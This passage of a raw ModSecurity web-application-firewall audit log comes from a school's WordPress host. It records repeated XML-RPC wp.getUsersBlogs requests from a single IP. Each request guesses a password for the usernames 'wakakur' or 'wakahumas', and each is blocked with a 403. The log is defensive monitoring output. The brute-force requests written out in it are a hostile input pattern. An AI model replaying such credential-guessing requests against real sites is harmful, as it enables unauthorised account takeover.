"OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863763069988 5296 (- - -) Stopwatch2: 1749863763069988 5296; combined=3752, p1=475, p2=3094, p3=0, p4=0, p5=106, sr=106, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59c9c94c-Z-- --1cd44734-A-- [14/Jun/2025:08:17:12 +0700] aEzNmF3g_boun6Rx5jLO1gAAAME 103.236.140.4 58520 103.236.140.4 8181 --1cd44734-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --1cd44734-C-- wp.getUsersBlogs wakakur marketing2023_ --1cd44734-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1cd44734-E-- --1cd44734-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (61+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863832837626 5439 (- - -) Stopwatch2: 1749863832837626 5439; combined=3802, p1=480, p2=3151, p3=0, p4=0, p5=100, sr=104, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1cd44734-Z-- --faf3b645-A-- [14/Jun/2025:08:18:30 +0700] aEzN5l3g_boun6Rx5jLO7AAAAMQ 103.236.140.4 58622 103.236.140.4 8181 --faf3b645-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --faf3b645-C-- wp.getUsersBlogs wakakur Pass1234 --faf3b645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --faf3b645-E-- --faf3b645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (47+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863910840104 6201 (- - -) Stopwatch2: 1749863910840104 6201; combined=4305, p1=563, p2=3573, p3=0, p4=0, p5=100, sr=98, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --faf3b645-Z-- --84fc8356-A-- [14/Jun/2025:08:19:33 +0700] aEzOJV3g_boun6Rx5jLPJgAAANM 103.236.140.4 58744 103.236.140.4 8181 --84fc8356-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 227 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --84fc8356-C-- wp.getUsersBlogs wakakur Administrators --84fc8356-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --84fc8356-E-- --84fc8356-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (58+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863973768747 4604 (- - -) Stopwatch2: 1749863973768747 4604; combined=3473, p1=360, p2=2920, p3=0, p4=0, p5=110, sr=80, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --84fc8356-Z-- --2f45a811-A-- [14/Jun/2025:08:20:39 +0700] aEzOZ0MWfhkd5Y0sFtrokQAAAIs 103.236.140.4 58864 103.236.140.4 8181 --2f45a811-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2f45a811-C-- wp.getUsersBlogs wakakur 12345!@#$% --2f45a811-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2f45a811-E-- --2f45a811-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864039221893 28457 (- - -) Stopwatch2: 1749864039221893 28457; combined=49902, p1=476, p2=3100, p3=0, p4=0, p5=23178, sr=105, sw=72, l=0, gc=23076 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2f45a811-Z-- --a176cf6b-A-- [14/Jun/2025:08:21:42 +0700] aEzOpkMWfhkd5Y0sFtronAAAAIA 103.236.140.4 58900 103.236.140.4 8181 --a176cf6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --a176cf6b-C-- wp.getUsersBlogs wakakur admin098123 --a176cf6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a176cf6b-E-- --a176cf6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (13+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864102477366 5930 (- - -) Stopwatch2: 1749864102477366 5930; combined=4058, p1=517, p2=3366, p3=0, p4=0, p5=104, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a176cf6b-Z-- --6fb81c52-A-- [14/Jun/2025:08:22:43 +0700] aEzO40MWfhkd5Y0sFtro0AAAAIg 103.236.140.4 59046 103.236.140.4 8181 --6fb81c52-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fb81c52-C-- wp.getUsersBlogs wakakur codename --6fb81c52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb81c52-E-- --6fb81c52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (66+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864163896321 6006 (- - -) Stopwatch2: 1749864163896321 6006; combined=4139, p1=527, p2=3419, p3=0, p4=0, p5=113, sr=94, sw=80, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb81c52-Z-- --05c2e24e-A-- [14/Jun/2025:08:23:43 +0700] aEzPH0MWfhkd5Y0sFtrpCwAAAIE 103.236.140.4 59180 103.236.140.4 8181 --05c2e24e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --05c2e24e-C-- wp.getUsersBlogs wakakur zzzzz --05c2e24e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --05c2e24e-E-- --05c2e24e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (59+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864223548366 5405 (- - -) Stopwatch2: 1749864223548366 5405; combined=3744, p1=450, p2=3098, p3=0, p4=0, p5=114, sr=100, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c2e24e-Z-- --2744983d-A-- [14/Jun/2025:08:24:44 +0700] aEzPXGmwZ6YUkjOdtI7B6AAAAAo 103.236.140.4 59324 103.236.140.4 8181 --2744983d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 222 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2744983d-C-- wp.getUsersBlogs wakakur abcd36888 --2744983d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2744983d-E-- --2744983d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864284009945 6654 (- - -) Stopwatch2: 1749864284009945 6654; combined=4616, p1=571, p2=3792, p3=0, p4=0, p5=143, sr=134, sw=110, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2744983d-Z-- --347e070f-A-- [14/Jun/2025:08:25:44 +0700] aEzPmGIDXuKmWNi2UBSz9gAAAEk 103.236.140.4 59454 103.236.140.4 8181 --347e070f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --347e070f-C-- wp.getUsersBlogs wakakur andrew --347e070f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --347e070f-E-- --347e070f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (64+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864344323400 5008 (- - -) Stopwatch2: 1749864344323400 5008; combined=3563, p1=429, p2=2948, p3=0, p4=0, p5=108, sr=89, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --347e070f-Z-- --5d6ea20e-A-- [14/Jun/2025:08:26:50 +0700] aEzP2mIDXuKmWNi2UBS0AgAAAFQ 103.236.140.4 59642 103.236.140.4 8181 --5d6ea20e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --5d6ea20e-C-- wp.getUsersBlogs wakakur blink182 --5d6ea20e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d6ea20e-E-- --5d6ea20e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (92+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864410103589 32739 (- - -) Stopwatch2: 1749864410103589 32739; combined=58677, p1=470, p2=3042, p3=0, p4=0, p5=27597, sr=98, sw=79, l=0, gc=27489 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d6ea20e-Z-- --2389d36c-A-- [14/Jun/2025:08:27:50 +0700] aEzQFmmwZ6YUkjOdtI7CQgAAAAE 103.236.140.4 59766 103.236.140.4 8181 --2389d36c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --2389d36c-C-- wp.getUsersBlogs wakakur jesus1 --2389d36c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2389d36c-E-- --2389d36c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864470132144 3990 (- - -) Stopwatch2: 1749864470132144 3990; combined=3055, p1=385, p2=2504, p3=0, p4=0, p5=95, sr=84, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2389d36c-Z-- --c924e175-A-- [14/Jun/2025:08:28:51 +0700] aEzQU2mwZ6YUkjOdtI7CYAAAAAw 103.236.140.4 59952 103.236.140.4 8181 --c924e175-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c924e175-C-- wp.getUsersBlogs wakakur bonnie --c924e175-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c924e175-E-- --c924e175-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (90+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864531064757 4195 (- - -) Stopwatch2: 1749864531064757 4195; combined=3241, p1=344, p2=2731, p3=0, p4=0, p5=96, sr=80, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c924e175-Z-- --617efe69-A-- [14/Jun/2025:08:29:51 +0700] aEzQj2mwZ6YUkjOdtI7CfwAAABM 103.236.140.4 60074 103.236.140.4 8181 --617efe69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --617efe69-C-- wp.getUsersBlogs wakakur Status --617efe69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --617efe69-E-- --617efe69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864591499502 4274 (- - -) Stopwatch2: 1749864591499502 4274; combined=3237, p1=360, p2=2710, p3=0, p4=0, p5=97, sr=81, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --617efe69-Z-- --85d36e65-A-- [14/Jun/2025:08:30:55 +0700] aEzQz2IDXuKmWNi2UBS0MQAAAFM 103.236.140.4 60186 103.236.140.4 8181 --85d36e65-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --85d36e65-C-- wp.getUsersBlogs wakahumas abcd1234 --85d36e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85d36e65-E-- --85d36e65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (52+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864655045873 6159 (- - -) Stopwatch2: 1749864655045873 6159; combined=4276, p1=557, p2=3529, p3=0, p4=0, p5=111, sr=117, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85d36e65-Z-- --7026c674-A-- [14/Jun/2025:08:32:02 +0700] aEzREl3g_boun6Rx5jLP5QAAAMI 103.236.140.4 60340 103.236.140.4 8181 --7026c674-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7026c674-C-- wp.getUsersBlogs wakahumas changeme! --7026c674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7026c674-E-- --7026c674-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (70+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749864722641082 6065 (- - -) Stopwatch2: 1749864722641082 6065; combined=4246, p1=570, p2=3487, p3=0, p4=0, p5=111, sr=95, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
